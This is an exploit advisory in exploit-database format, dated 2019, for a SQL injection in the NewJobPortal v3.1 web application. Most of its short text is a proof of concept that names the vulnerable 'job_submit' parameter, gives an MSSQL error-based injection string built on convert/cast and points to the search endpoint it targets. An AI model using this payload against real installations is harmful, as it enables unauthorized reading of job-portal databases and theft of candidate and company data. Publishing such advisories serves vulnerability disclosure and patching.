===========================================================================================# Exploit Title: NewJobPortal v3.1 - 'job_submit' SQL Inj.# Dork: N/A# Date: 25-03-2019# Exploit Author: Mehmet EMIROGLU# Vendor Homepage: https://codecanyon.net/item/job-portal/15330095# Version: v3.1# Category: Webapps# Tested on: Wamp64, Windows# CVE: N/A# Software Description: Job portal is developed for creating an interactive
job vacancy for candidates.
This web application is to be conceived in its current form as a dynamic
site-requiring constant
updates both from the seekers as well as the companies.===========================================================================================# POC - SQLi# Parameters : job_submit# Attack Pattern : convert(int%2c+cast(0x454d49524f474c55+as+varchar(8000)))# POST Method : http://localhost/newjobportal/job_search/search===========================================================================================
